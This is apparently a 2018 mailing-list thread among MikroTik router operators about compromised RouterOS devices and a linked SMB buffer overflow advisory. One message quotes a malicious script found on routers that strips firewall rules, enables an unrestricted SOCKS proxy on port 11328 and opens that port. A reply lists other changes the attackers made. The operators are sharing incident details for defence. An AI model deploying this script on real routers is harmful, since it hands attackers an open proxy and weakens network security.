It will also change device identity, change admin password, add Admin,
add 5 firewall filter rules to redirect forward traffic, change DNS
server, enable DDNS, add IP Web Proxy rules and more, but that is all I
remember off the top of my head.
On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:
We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:
/ip firewall filter remove [/ip firewall filter find where comment ~
"port [0-9]*"];/ip socks set enabled=yes port=11328
max-connections=255 connection-idle-timeout=60;/ip socks access remove
[/ip socks access find];/ip firewall filter add chain=input
protocol=tcp port=11328 action=accept comment="port 11328";/ip
firewall filter move [/ip firewall filter find comment="port 11328"] 1;
--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC <http://www.crescommwifi.com/> | (360) 928-0000, x1
*From:* [email protected]
<[email protected]> *On Behalf Of *Shawn C. Peppers via
Mikrotik-users
*Sent:* Friday, March 16, 2018 11:54 AM
*To:* [email protected]; [email protected]
*Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
I have not tested this yet but....
https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com>
_______________________________________________
Mikrotik-users mailing list
[email protected]
http://lists.wispa.org/mailman/listinfo/mikrotik-users
--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained
---
This email has been checked for viruses by AVG.
https://www.avg.com
_______________________________________________
Mikrotik-users mailing list
[email protected]
http://lists.wispa.org/mailman/listinfo/mikrotik-users
